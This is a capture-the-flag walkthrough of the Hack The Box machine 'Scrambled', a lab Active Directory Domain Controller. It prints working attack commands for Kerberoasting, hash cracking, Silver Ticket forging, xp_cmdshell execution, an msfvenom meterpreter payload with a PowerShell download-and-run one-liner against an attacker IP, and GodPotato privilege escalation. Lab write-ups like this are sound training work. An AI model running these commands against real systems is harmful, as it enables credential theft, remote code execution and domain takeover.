Hack The Box: Scrambled
Walkthrough
- Nmap
- Website shows a username and hints for a password
- Login to SMB-Share, NTLM Authentication seems disabled
- Download PDF, NTLM Authentication is indeed disabled
- Kerberoasting
- Crack Hash of a service Account
- Create a Silver Ticket to access the MSSQL server impersonating the Administrator
- Enable xp_cmdshell
- Get a reverse shell as the service account
- Abuse SeImpersonatePrivilege with GodPotato to escalate to NT AUTHORITY\SYSTEM
We start with an initial nmap port scan. This series of walkthroughs mainly focuses on Windows and Active Directory, and this box is a Domain Controller. The scan results confirm it: Kerberos on port 88 is only served by a Domain Controller.
A service scan of the open LDAP port also shows the hostname used in the SSL certificate: DC1.scrm.local. We add it together with the domain scrm.local to our local /etc/hosts file.
The initial scan also shows port 80, so the DC hosts a website; let's look at that first. The site is a very static template with a few subpages, only two of which were really interesting. The first one is a contact-support page, and the screenshot on it shows a username: ksimpson. So we have a possible username for the AD environment.
The second interesting page is about password resets. It states that when you contact support, your password is reset to your username. ksimpson contacted support for demo purposes, so maybe his password was reset to his username?
I tried to connect to the SMB shares as ksimpson with the password ksimpson, but it failed with an error saying the request is not supported (STATUS_NOT_SUPPORTED). That is what you get when NTLM authentication is disabled, so I tried Kerberos instead, which worked.
Now I was able to list all shares using Kerberos authentication (-k):
impacket-smbclient scrm.local/ksimpson:ksimpson@dc1.scrm.local -k
There were a lot of them and I didn't want to enumerate them manually, so I used CrackMapExec with the spider_plus module instead, which walks every accessible share and writes out a list of all files it finds.
cme smb dc1.scrm.local -k -d scrm.local -u ksimpson -p ksimpson -M spider_plus
The list contains a PDF named "Network Security Changed.pdf", which looked promising, so I connected to the share once more and downloaded it.
It states that NTLM authentication was indeed disabled and that all access to the MSSQL database has been removed except for network administrators. Nothing more special here.
But we have valid credentials, so we can enumerate the domain or Kerberoast with them. Let's start with Kerberoasting: any authenticated user can request a service ticket for an account that has a ServicePrincipalName set, and that ticket is encrypted with the service account's password hash, so it can be cracked offline. We indeed find such an account: scrm.local/sqlsvc. Let's try to crack its password with hashcat.
impacket-GetUserSPNs scrm.local/ksimpson@dc1.scrm.local -request -dc-host dc1.scrm.local -k
We copy the hash to a machine with a better GPU and crack it with rockyou.txt. First we need the correct hashcat mode; a quick search reveals that mode 13100 (Kerberos 5 TGS-REP etype 23, i.e. RC4) is the one for Kerberoast hashes.
And it cracked. We now have valid credentials for the user scrm.local/sqlsvc: Pegasus60
What can we do with that? We know we just cracked the service account the MSSQL database runs under: the account name and its SPN (MSSQLSvc/dc1.scrm.local:1433) point at the database. We also know that only network administrators are allowed to connect to it.
When we hold the credentials or hash of a service account, we can forge Silver Tickets for that service and impersonate any user we want, including administrators.
A Silver Ticket is a forged TGS (service) ticket. It is presented directly to the service without ever going to the DC: a service ticket is encrypted with the service account's long-term key, so whoever holds that key (here the NT hash of sqlsvc) can mint tickets for that service with an arbitrary PAC. Because the krbtgt key is not involved, the ticket is only valid for that one service, and the DC never sees the forgery unless the service explicitly asks the DC to validate the PAC.
To create a Silver Ticket, an attacker needs:
- the NTLM hash of the service account's password;
- the SID of the domain;
- the service principal name (SPN) associated with the service account.
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
To turn our known password into its NT hash we can simply use openssl: the NT hash is just MD4 over the UTF-16LE encoding of the password, which is exactly what the iconv/openssl pipeline below computes. (On OpenSSL 3, MD4 lives in the legacy provider, so you may have to add -provider legacy -provider default to the dgst call.)
iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4
To get the SID of the domain scrm.local we can request the PAC of a known user, since we have valid credentials. impacket-getPac retrieves the PAC (Privilege Attribute Certificate) of the given target user with nothing more than normal authenticated user credentials, and the PAC contains the domain SID.
impacket-getPac -targetUser administrator scrm.local/ksimpson:ksimpson
Now we have all necessary values, since the SPN can simply be copied from the GetUserSPNs output.
With the following command we forge a Silver Ticket for an administrator account, here Administrator. Nothing is requested from the DC: impacket-ticketer builds the ticket locally from the values we supply and writes it to administrator.ccache, which we then export into our session.
impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain scrm.local -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -spn MSSQLSvc/dc1.scrm.local:1433 administrator
Since the ticket is encrypted with sqlsvc's key, the MSSQL service on the DC can decrypt it, so we can try to log in with it.
export KRB5CCNAME=administrator.ccache
impacket-mssqlclient -k dc1.scrm.local
Nice, we have access as the Administrator account. We can now enable xp_cmdshell to run OS commands through MSSQL (mssqlclient's enable_xp_cmdshell helper does the sp_configure 'show advanced options' / sp_configure 'xp_cmdshell' steps with a RECONFIGURE after each) and run whoami. Since the database runs as sqlsvc, the commands run as that user, not as Administrator; but this confirms we already have code execution on the DC as a service account.
So now let's get a meterpreter reverse shell. Netcat is nice and all, but meterpreter and its modules can be really helpful; using it only makes you a skid if you don't know what you are doing.
I set up multi/handler with the encrypted windows/x64/meterpreter/reverse_https payload, listening on my tun0 interface, which is the interface created by OpenVPN.
For the reverse shell I like to use a PowerShell script that runs completely in memory, never touches disk and is a small one-liner to execute. It uses delegates and already-loaded Windows API functions (GetProcAddress) to resolve and call further Windows API functions.
What's going on here:
- lookupFunc → obtains references to the GetModuleHandle and GetProcAddress methods from the System.dll assembly (type Microsoft.Win32.UnsafeNativeMethods) using GetType and GetMethod, i.e. the reflection technique.
- getDelegateType → defines a delegate type with the argument and return types of the API being called, again via Reflection, and returns it.
- VirtualAlloc → to allocate writable, readable, and executable (unmanaged) memory space in virtual address space of the calling process.
- Copy → to copy the shellcode bytes into allocated memory location.
- CreateThread → to create a new execution thread in the calling process and execute the shellcode.
- WaitForSingleObject → to delay termination of the PowerShell script until the shell fully executes.
We now only have to generate shellcode for this template and paste it in:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.16.38 LPORT=443 EXITFUNC=thread -f ps1
To execute the shellcode we download and run the script in memory through PowerShell, which is an easy one-liner:
xp_cmdshell "powershell.exe iex(iwr -usebasicparsing 10.10.16.38/CreateThreadDeleg.ps1)"
After that we get our meterpreter session.
The first thing to do is migrate into a more stable process, so that we don't lose our shell if the initial process suddenly dies.
After getting a shell, one of the first things I do is enumerate the user's privileges. Since this is a service account, SeImpersonatePrivilege is very commonly present, and it can easily be abused to execute commands as NT AUTHORITY\SYSTEM.
A common tool for that is JuicyPotato or one of the other Potato variants. I personally like GodPotato, since it supports all current Windows versions up to Windows Server 2022. We simply upload GodPotato to a writable path on the target's disk.
https://github.com/BeichenDream/GodPotato
After that it is very easy to execute commands as NT AUTHORITY\SYSTEM: just pass the command you want to run in the -cmd parameter. I like to create a new user and make it a local admin, which on a DC effectively makes me a Domain Admin: a Domain Controller has no local SAM accounts, so a "local" user created there is really a domain account, and the local Administrators group is the domain's Builtin\Administrators group, which has full control over the DC. We also can't perform Pass-the-Hash attacks, because NTLM authentication is disabled, but we can use Kerberos and simply provide the known credentials. So here I create a new user, MHT.
Then I add him to the Administrators group on the DC, which makes me an indirect Domain Admin.
Now we can simply log in and grab the flags. That's it.
I am aware that there are other ways to get SYSTEM besides a reverse shell as the service user, but this was the most straightforward, easiest and fastest way to get SYSTEM on this box.